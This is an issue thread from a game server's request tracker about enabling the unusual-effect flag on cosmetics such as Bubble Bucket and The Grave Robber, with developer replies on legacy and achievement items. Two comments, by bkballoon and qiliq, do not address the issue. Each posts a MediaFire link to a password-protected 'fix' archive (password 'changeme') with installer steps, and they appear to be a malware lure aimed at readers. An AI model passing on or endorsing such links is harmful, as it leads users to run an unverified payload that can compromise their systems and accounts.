### ISSUE TITLE
Enable unusual flag on these cosmetics

### ISSUE THREAD

**Issue by Sod-ers** [BB-Games/gamemode-issues-requests#86]
- Hearty Traveller
- Cigar
- Vanquisher's Victory
- Bubble Bucket
- The Grave Robber

**Why you would like to see this resolved, what does it enhance / bring to the table?**
Allows further customization of these cosmetics.

**Additional context**
We had a conversation a long time ago on surf_meme talking about old items & bubble bucket came up. You mentioned to me that effects could be applied to it but when I check, the flag is disabled. Please grant the ability to create a Unusual Bubbley Bubble Bucket. Hearty Traveller, Vanquisher's Victory, & The Grave Robber are achievement items so the flag needs to prevent trading after jars are applied.

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by TeddiO** [comment]
I think if I recall the context of the bubble bucket conversation, it was more that we could apply effects to it in the sense of unusual effects, but what I probably omitted in this conversation is that it's unlikely we'll do so as it's a legacy item and I'm not sure we really want to change it. I'll have a chat with Kaiden to get his opinion. 

I don't see why we couldn't enable the flags on the other items though.

**Comment by Sod-ers** [comment]
Gotcha, that explains why I can't apply jars to the variation of Nemo Hat with bubbles, probably a legacy item as well.

If there's concerns about applying jars to The Grave Robber that already has a predominant effect, I suggest:
- Swap flags from the item HeadStone.
- Remove the unusual effect currently on The Grave Robber & apply it to HeadStone.

Because they're the same cosmetic, but HeadStone has no effect & Jars can be applied. The only way I know of obtaining it is the achievement. The only marketplace history I can find is Juniors listing. I also found 0 listings for The Grave Robber but I have another from a crate reward dated 31/07/2022 & there aren't any restrictions in the item info. So I believe The Grave Robber is more widespread but you'd have to check the statistics on that. Maybe neat to give The Grave Robber a dropchance in the halloween crate or enable the crafting flag but that's goes beyond this issue.

A revised list of cosmetics to enable the unusual flag:
- Hearty Traveller
- Vanquisher's Victory
- The Grave Robber

**Comment by TeddiO** [comment]
So I've done some digging and reviewed some internal data on this:

The Grave Robber & Headstone were both briefly available in an older Seasonal crate, though that was probably a mistake if I'm honest (left hand and right hand not communicating). They were always meant to be an achievement item. Whether or not they'll become more available in the future is probably a separate discussion; but the headstone already has the flag enabled so it's unlikely we'll be enabling it for the Grave Robber.
